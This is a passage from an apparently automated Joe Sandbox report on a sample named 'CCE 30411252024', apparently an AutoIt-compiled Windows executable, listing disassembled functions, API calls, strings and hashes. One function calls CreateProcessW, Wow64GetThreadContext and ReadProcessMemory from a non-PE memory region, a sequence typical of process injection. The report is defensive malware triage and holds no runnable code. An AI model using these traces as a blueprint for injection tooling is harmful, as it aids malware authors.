                                                                                          • Part of subcall function 00EE41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00EE39FE,?,00000001), ref: 00EE41DB
                                                                                        • _free.LIBCMT ref: 00F536B7
                                                                                        • _free.LIBCMT ref: 00F536FE
                                                                                          • Part of subcall function 00EEC833: __wsplitpath.LIBCMT ref: 00EEC93E
                                                                                          • Part of subcall function 00EEC833: _wcscpy.LIBCMT ref: 00EEC953
                                                                                          • Part of subcall function 00EEC833: _wcscat.LIBCMT ref: 00EEC968
                                                                                          • Part of subcall function 00EEC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00EEC978
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                        • API String ID: 805182592-1757145024
                                                                                        • Opcode ID: caf033b8c19055b28c2cf6a6a34d7fad4fe60bc7ebdbcec40e3c1fdac3ec0498
                                                                                        • Instruction ID: 671471feacd704172f3c3c7fa547d0ab9cb9e884cb33853742758be9615cac65
                                                                                        • Opcode Fuzzy Hash: caf033b8c19055b28c2cf6a6a34d7fad4fe60bc7ebdbcec40e3c1fdac3ec0498
                                                                                        • Instruction Fuzzy Hash: 7C91A27191025DAFCF04EFA9CC919EEB7B4BF08350F144429F916BB291EB74AA09DB50
                                                                                        Function 00EE4A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EE5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FA1148,?,00EE61FF,?,00000000,00000001,00000000), ref: 00EE5392
                                                                                          • Part of subcall function 00EE49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00EE4A1D
                                                                                        • _wcscat.LIBCMT ref: 00F52D80
                                                                                        • _wcscat.LIBCMT ref: 00F52DB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileModuleNameOpen
                                                                                        • String ID: \$\Include\
                                                                                        • API String ID: 3592542968-2640467822
                                                                                        • Opcode ID: efa52121d84fcd2d972d8779934b7084008f26fcf935a1469de0e62c46abb729
                                                                                        • Instruction ID: cf50383bfd60539f54f41ef41cc15957c47d4d95d075582a3b238168aa7c1bea
                                                                                        • Opcode Fuzzy Hash: efa52121d84fcd2d972d8779934b7084008f26fcf935a1469de0e62c46abb729
                                                                                        • Instruction Fuzzy Hash: 465197F26043889FC394EF5EDC8195AB3F4FF5A300B40552EF64993261EB309508EB52
                                                                                        Function 00F034AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __getstream.LIBCMT ref: 00F034FE
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00F03539
                                                                                        • __wopenfile.LIBCMT ref: 00F03549
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                        • String ID: <G
                                                                                        • API String ID: 1820251861-2138716496
                                                                                        • Opcode ID: 3a186ef3394e64cb10c929f82b23ee97a02d9577e6e9153a5e690b005da2ab56
                                                                                        • Instruction ID: df7f2ff8663b2ce8345bf103bd3b44c9e640d527d2c29ccbb2a1101d492d95a1
                                                                                        • Opcode Fuzzy Hash: 3a186ef3394e64cb10c929f82b23ee97a02d9577e6e9153a5e690b005da2ab56
                                                                                        • Instruction Fuzzy Hash: 41110A75E003069BEB61FF718C4267E37A8AF45360B188825E415CB2D1EB38DA11B7A1
                                                                                        Function 00EFD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00EFD28B,SwapMouseButtons,00000004,?), ref: 00EFD2BC
                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00EFD28B,SwapMouseButtons,00000004,?,?,?,?,00EFC865), ref: 00EFD2DD
                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00EFD28B,SwapMouseButtons,00000004,?,?,?,?,00EFC865), ref: 00EFD2FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: da4397fb59ae4e536ab6ccc0655c2e8bfb9bebf4dcd647468bdc00c1e2d07a40
                                                                                        • Instruction ID: 9b19dee4fc2ff0ba67a21e15dc2d71cca5d112b85349ed7faeade0ac77ef8c27
                                                                                        • Opcode Fuzzy Hash: da4397fb59ae4e536ab6ccc0655c2e8bfb9bebf4dcd647468bdc00c1e2d07a40
                                                                                        • Instruction Fuzzy Hash: 9D115A75A1520CFFDB118F64CC84EBE7BB9EF44744B005429EA01E7120D6719E40AB60
                                                                                        Function 01056F78 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01057733
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010577C9
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010577EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2160099918.0000000001055000.00000040.00000020.00020000.00000000.sdmp, Offset: 01055000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1055000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                        • Instruction ID: 0337a94615ec5550e4d59b847ddc85448ea3585e9d58db4808329cb44a9f1b14
                                                                                        • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                        • Instruction Fuzzy Hash: C4620930A14218DBEB64CFA4C840BDEB776EF58300F5091A9D64DEB390E7799E81CB59
                                                                                        Function 00F2C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EE4517: _fseek.LIBCMT ref: 00EE452F
                                                                                          • Part of subcall function 00F2C56D: _wcscmp.LIBCMT ref: 00F2C65D
                                                                                          • Part of subcall function 00F2C56D: _wcscmp.LIBCMT ref: 00F2C670
                                                                                        • _free.LIBCMT ref: 00F2C4DD
                                                                                        • _free.LIBCMT ref: 00F2C4E4
                                                                                        • _free.LIBCMT ref: 00F2C54F
                                                                                          • Part of subcall function 00F01C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00F07A85), ref: 00F01CB1
                                                                                          • Part of subcall function 00F01C9D: GetLastError.KERNEL32(00000000,?,00F07A85), ref: 00F01CC3
                                                                                        • _free.LIBCMT ref: 00F2C557
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                        • String ID:
                                                                                        • API String ID: 1552873950-0
                                                                                        • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                        • Instruction ID: 2316326460aae9ea347c621825c109a5c2aed61aa8290dc2fcf709eb96cabdcb
                                                                                        • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                        • Instruction Fuzzy Hash: 30516EF1A04218AFDF149F64DC81BAEBBB9EF48300F10409EF659A7281DB755A809F58
                                                                                        Function 00EFEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00EFEBB2
                                                                                          • Part of subcall function 00EE51AF: _memset.LIBCMT ref: 00EE522F
                                                                                          • Part of subcall function 00EE51AF: _wcscpy.LIBCMT ref: 00EE5283
                                                                                          • Part of subcall function 00EE51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EE5293
                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00EFEC07
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EFEC16
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F53C88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1378193009-0
                                                                                        • Opcode ID: 759bfa3381f7ec76023357b752c2115fc14f5d7f4e37fa8121f86efd42069d77
                                                                                        • Instruction ID: baec4a5332cc00cf2c359998747de709ec2128443b191348316c3faf16db7207
                                                                                        • Opcode Fuzzy Hash: 759bfa3381f7ec76023357b752c2115fc14f5d7f4e37fa8121f86efd42069d77
                                                                                        • Instruction Fuzzy Hash: 3221DA719047989FE7329B28CC59BE7FBEC9B45309F04048DE79A66241C7B43A849B51
                                                                                        Function 00EE40E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F53725
                                                                                        • GetOpenFileNameW.COMDLG32 ref: 00F5376F
                                                                                          • Part of subcall function 00EE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE53B1,?,?,00EE61FF,?,00000000,00000001,00000000), ref: 00EE662F
                                                                                          • Part of subcall function 00EE40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EE40C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                        • String ID: X
                                                                                        • API String ID: 3777226403-3081909835
                                                                                        • Opcode ID: 1a33f7442889db73a72f0f8fcf94288c6cac5498a694298ae9476619c39c8dc1
                                                                                        • Instruction ID: 494135c103a314b11775e55a1e23f41626a1b38f0dcc2b44dc1afae088ec5cba
                                                                                        • Opcode Fuzzy Hash: 1a33f7442889db73a72f0f8fcf94288c6cac5498a694298ae9476619c39c8dc1
                                                                                        • Instruction Fuzzy Hash: 3421C3B1A1018CABDF11DF99D805BDEBBF89F49300F008019E505B7281DBB45A899F61
                                                                                        Function 00F2C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00F2C72F
                                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F2C746
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        • Opcode ID: 9665b6994aca2e8bd078c964c15be2d0057eb79444e253df01ce0574f9e9dcbf
                                                                                        • Instruction ID: 6d3768b43b1f74f1be27c67952a19539b0742fb7fce34a58a8b2ca2010faa4b8
                                                                                        • Opcode Fuzzy Hash: 9665b6994aca2e8bd078c964c15be2d0057eb79444e253df01ce0574f9e9dcbf
                                                                                        • Instruction Fuzzy Hash: 08D05E71A0030EABDB10AB90DC0EF8A776C9704704F0001A0B660E50B1DAF1E6999B55
                                                                                        Function 00F3F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7f4f97e977be49acccf4b9ddce60b6fcd6f693090d86c70ebde559466edba156
                                                                                        • Instruction ID: ce47d3b08519c15ec2e4be8fe29eac51598ad487df4ae5ed536ab3c32e14288e
                                                                                        • Opcode Fuzzy Hash: 7f4f97e977be49acccf4b9ddce60b6fcd6f693090d86c70ebde559466edba156
                                                                                        • Instruction Fuzzy Hash: FAF16B71A043459FC710DF24C885B6EB7E5BF88324F14892DF9999B392DB74E909CB82
                                                                                        Function 00F0395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00F03973
                                                                                          • Part of subcall function 00F081C2: __NMSG_WRITE.LIBCMT ref: 00F081E9
                                                                                          • Part of subcall function 00F081C2: __NMSG_WRITE.LIBCMT ref: 00F081F3
                                                                                        • __NMSG_WRITE.LIBCMT ref: 00F0397A
                                                                                          • Part of subcall function 00F0821F: GetModuleFileNameW.KERNEL32(00000000,00FA0312,00000104,00000000,00000001,00000000), ref: 00F082B1
                                                                                          • Part of subcall function 00F0821F: ___crtMessageBoxW.LIBCMT ref: 00F0835F
                                                                                          • Part of subcall function 00F01145: ___crtCorExitProcess.LIBCMT ref: 00F0114B
                                                                                          • Part of subcall function 00F01145: ExitProcess.KERNEL32 ref: 00F01154
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        • RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000001,00000000,?,?,00EFF507,?,0000000E), ref: 00F0399F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1372826849-0
                                                                                        • Opcode ID: 5818a722434dea69d7d8fac827b1c52ba314a0593245c89daf1cbc5a7f19bc7c
                                                                                        • Instruction ID: 8e93c80492db6d1eacb45c1b8cad086dbf549982c5ae63d7feeb33d9615b3584
                                                                                        • Opcode Fuzzy Hash: 5818a722434dea69d7d8fac827b1c52ba314a0593245c89daf1cbc5a7f19bc7c
                                                                                        • Instruction Fuzzy Hash: 3901B9367453159AF6113B28EC52B2A335D9F82770F21402AF505D72D1DFF4AD0076A1
                                                                                        Function 00F2C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F2C385,?,?,?,?,?,00000004), ref: 00F2C6F2
                                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F2C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F2C708
                                                                                        • CloseHandle.KERNEL32(00000000,?,00F2C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F2C70F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 3397143404-0
                                                                                        • Opcode ID: 7b8939e249c5483f2eef1270a7c0e444d2165b26644b1fcd8eb71734d979b934
                                                                                        • Instruction ID: c37613215d00d0c9a17b2653b23a21d8cbc30ceb2382d6fe8ad4eae2133bb0ea
                                                                                        • Opcode Fuzzy Hash: 7b8939e249c5483f2eef1270a7c0e444d2165b26644b1fcd8eb71734d979b934
                                                                                        • Instruction Fuzzy Hash: AFE08632640228B7E7211B54AC0AFCE7B28AB05B70F104110FB24690E0D7F12511A798
                                                                                        Function 00F2BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00F2BB72
                                                                                          • Part of subcall function 00F01C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00F07A85), ref: 00F01CB1
                                                                                          • Part of subcall function 00F01C9D: GetLastError.KERNEL32(00000000,?,00F07A85), ref: 00F01CC3
                                                                                        • _free.LIBCMT ref: 00F2BB83
                                                                                        • _free.LIBCMT ref: 00F2BB95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                        • Instruction ID: 4b9f8b0e7a2b9416bc8bf290c0c6801e60df1d7c5b38ce18737a6b8d2d39355d
                                                                                        • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                        • Instruction Fuzzy Hash: 8BE012A1A4175146EA2466B97E4CEF333CC5F44361714081DBD5AE7186CF28F840B9A4
                                                                                        Function 00EE2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EE22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00EE24F1), ref: 00EE2303
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EE25A1
                                                                                        • CoInitialize.OLE32(00000000), ref: 00EE2618
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F5503A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3815369404-0
                                                                                        • Opcode ID: 1cabd4157b6e76382b0470849a3709362c5eb01af57d21f975f0c67c99aebd3f
                                                                                        • Instruction ID: a8b94470f2789275f3d6c9ee765a45339d9946aeef18514a75f708009fdd1cae
                                                                                        • Opcode Fuzzy Hash: 1cabd4157b6e76382b0470849a3709362c5eb01af57d21f975f0c67c99aebd3f
                                                                                        • Instruction Fuzzy Hash: 7771A0F890139D8E8704DF5AAD90695BBE8FB9B380F86412ED119D73B2DB708404EF14
                                                                                        Function 00EE3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsThemeActive.UXTHEME ref: 00EE3A73
                                                                                          • Part of subcall function 00F01405: __lock.LIBCMT ref: 00F0140B
                                                                                          • Part of subcall function 00EE3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00EE3AF3
